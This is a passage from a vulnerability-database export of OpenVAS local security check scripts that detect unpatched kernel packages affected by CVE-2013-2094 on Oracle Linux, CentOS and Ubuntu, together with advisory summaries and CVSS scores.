See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123624\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:06:25 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2013-2524\");\n script_tag(name:\"insight\", value:\"ELSA-2013-2524 - Unbreakable Enterprise kernel Security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2013-2524\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2013-2524.html\");\n script_cve_id(\"CVE-2013-2094\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(5|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"kernel-uek\", 
rpm:\"kernel-uek~2.6.39~400.24.1.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug\", rpm:\"kernel-uek-debug~2.6.39~400.24.1.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug-devel\", rpm:\"kernel-uek-debug-devel~2.6.39~400.24.1.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-devel\", rpm:\"kernel-uek-devel~2.6.39~400.24.1.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-doc\", rpm:\"kernel-uek-doc~2.6.39~400.24.1.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-firmware\", rpm:\"kernel-uek-firmware~2.6.39~400.24.1.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"kernel-uek\", rpm:\"kernel-uek~2.6.39~400.24.1.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug\", rpm:\"kernel-uek-debug~2.6.39~400.24.1.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug-devel\", rpm:\"kernel-uek-debug-devel~2.6.39~400.24.1.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-devel\", rpm:\"kernel-uek-devel~2.6.39~400.24.1.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-doc\", rpm:\"kernel-uek-doc~2.6.39~400.24.1.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-firmware\", 
rpm:\"kernel-uek-firmware~2.6.39~400.24.1.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2094"], "description": "The remote host is missing an update for the ", "modified": "2019-04-29T00:00:00", "published": "2013-05-17T00:00:00", "id": "OPENVAS:1361412562310881731", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881731", "type": "openvas", "title": "CentOS Update for kernel CESA-2013:0830 centos6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2013:0830 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.881731\");\n script_version(\"2019-04-29T15:08:03+0000\");\n script_tag(name:\"last_modification\", value:\"2019-04-29 15:08:03 +0000 (Mon, 29 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2013-05-17 09:53:11 +0530 (Fri, 17 May 2013)\");\n script_cve_id(\"CVE-2013-2094\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for kernel CESA-2013:0830 centos6\");\n\n script_xref(name:\"CESA\", value:\"2013:0830\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2013-May/019733.html\");\n script_xref(name:\"URL\", value:\"https://access.redhat.com/knowledge/articles/11258\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n script_tag(name:\"affected\", value:\"kernel on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n This update fixes the following security issue:\n\n * It was found that the Red Hat Enterprise Linux 6.1 kernel update\n 
(RHSA-2011:0542) introduced an integer conversion issue in the Linux\n kernel's Performance Events implementation. This led to a user-supplied\n index into the perf_swevent_enabled array not being validated properly,\n resulting in out-of-bounds kernel memory access. A local, unprivileged user\n could use this flaw to escalate their privileges. (CVE-2013-2094,\n Important)\n\n A public exploit that affects Red Hat Enterprise Linux 6 is available.\n\n Refer to Red Hat Knowledge Solution 373743, linked to in the References,\n for further information and mitigation instructions for users who are\n unable to immediately apply this update.\n\n Users should upgrade to these updated packages, which contain a backported\n patch to correct this issue. The system must be rebooted for this update to\n take effect.\n\n 4. Solution:\n\n Before applying this update, make sure all previously-released errata\n relevant to your system have been applied.\n\n This update is available via the Red Hat Network. Details on how to\n use the Red Hat Network to apply this update are available at the linked\n references.\n\n To install kernel packages manually, use 'rpm -ivh [package] Do not\n use rpm -Uvh as that will remove the running kernel binaries from\n your system. You may use rpm -e to remove old kernels after\n determining that the new kernel functions properly on your system.\n\n 5. 
Bugs fixed:\n\n 962792 - CVE-2013-2094 kernel: perf_swevent_enabled array out-of-bound access\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.32~358.6.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.32~358.6.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.32~358.6.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.32~358.6.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.32~358.6.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.32~358.6.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.32~358.6.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~2.6.32~358.6.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~2.6.32~358.6.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", 
"cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-12-04T11:21:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2094"], "description": "Check for the Version of linux", "modified": "2017-12-01T00:00:00", "published": "2013-05-17T00:00:00", "id": "OPENVAS:841432", "href": "http://plugins.openvas.org/nasl.php?oid=841432", "type": "openvas", "title": "Ubuntu Update for linux USN-1827-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1827_1.nasl 7958 2017-12-01 06:47:47Z santu $\n#\n# Ubuntu Update for linux USN-1827-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"linux on Ubuntu 13.04\";\ntag_insight = \"An flaw was discovered in the Linux kernel's perf_events interface. 
A local\n user could exploit this flaw to escalate privileges on the system.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(841432);\n script_version(\"$Revision: 7958 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 07:47:47 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-05-17 09:56:18 +0530 (Fri, 17 May 2013)\");\n script_cve_id(\"CVE-2013-2094\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for linux USN-1827-1\");\n\n script_xref(name: \"USN\", value: \"1827-1\");\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1827-1/\");\n script_summary(\"Check for the Version of linux\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU13.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.8.0-21-generic\", ver:\"3.8.0-21.32\", rls:\"UBUNTU13.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:35:55", "bulletinFamily": "scanner", "cvelist": 
["CVE-2013-2094"], "description": "Oracle Linux Local Security Checks ELSA-2013-0830", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123623", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123623", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2013-0830", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2013-0830.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123623\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:06:24 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2013-0830\");\n script_tag(name:\"insight\", value:\"ELSA-2013-0830 - kernel security update. 
Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2013-0830\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2013-0830.html\");\n script_cve_id(\"CVE-2013-2094\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.32~358.6.2.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.32~358.6.2.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.32~358.6.2.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.32~358.6.2.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.32~358.6.2.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-firmware\", 
rpm:\"kernel-firmware~2.6.32~358.6.2.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.32~358.6.2.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~2.6.32~358.6.2.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~2.6.32~358.6.2.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2094"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2013-06-04T00:00:00", "id": "OPENVAS:1361412562310841449", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841449", "type": "openvas", "title": "Ubuntu Update for linux-lts-raring USN-1849-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1849_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for linux-lts-raring USN-1849-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841449\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-06-04 09:20:20 +0530 (Tue, 04 Jun 2013)\");\n script_cve_id(\"CVE-2013-2094\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for linux-lts-raring USN-1849-1\");\n\n script_xref(name:\"USN\", value:\"1849-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1849-1/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-raring'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n script_tag(name:\"affected\", value:\"linux-lts-raring on Ubuntu 12.04 LTS\");\n script_tag(name:\"insight\", value:\"Kees Cook discovered a flaw in the Linux kernel's iSCSI subsystem. 
A remote\n unauthenticated attacker could exploit this flaw to cause a denial of\n service (system crash) or potentially gain administrative privileges.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.8.0-23-generic\", ver:\"3.8.0-23.34~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:54", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2094"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2013-05-17T00:00:00", "id": "OPENVAS:1361412562310841432", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841432", "type": "openvas", "title": "Ubuntu Update for linux USN-1827-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1827_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for linux USN-1827-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A 
PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841432\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-05-17 09:56:18 +0530 (Fri, 17 May 2013)\");\n script_cve_id(\"CVE-2013-2094\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for linux USN-1827-1\");\n\n script_xref(name:\"USN\", value:\"1827-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1827-1/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU13\\.04\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 13.04\");\n script_tag(name:\"insight\", value:\"An flaw was discovered in the Linux kernel's perf_events interface. 
A local\n user could exploit this flaw to escalate privileges on the system.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU13.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.8.0-21-generic\", ver:\"3.8.0-21.32\", rls:\"UBUNTU13.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2094"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2013-05-17T00:00:00", "id": "OPENVAS:1361412562310841425", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841425", "type": "openvas", "title": "Ubuntu Update for linux-lts-quantal USN-1828-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1828_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for linux-lts-quantal USN-1828-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_tag(name:\"affected\", value:\"linux-lts-quantal on Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"An flaw was discovered in the Linux kernel's perf_events interface. A local\n user could exploit this flaw to escalate privileges on the system.\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.841425\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-05-17 09:54:35 +0530 (Fri, 17 May 2013)\");\n script_cve_id(\"CVE-2013-2094\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_name(\"Ubuntu Update for linux-lts-quantal USN-1828-1\");\n\n script_xref(name:\"USN\", value:\"1828-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1828-1/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-quantal'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n 
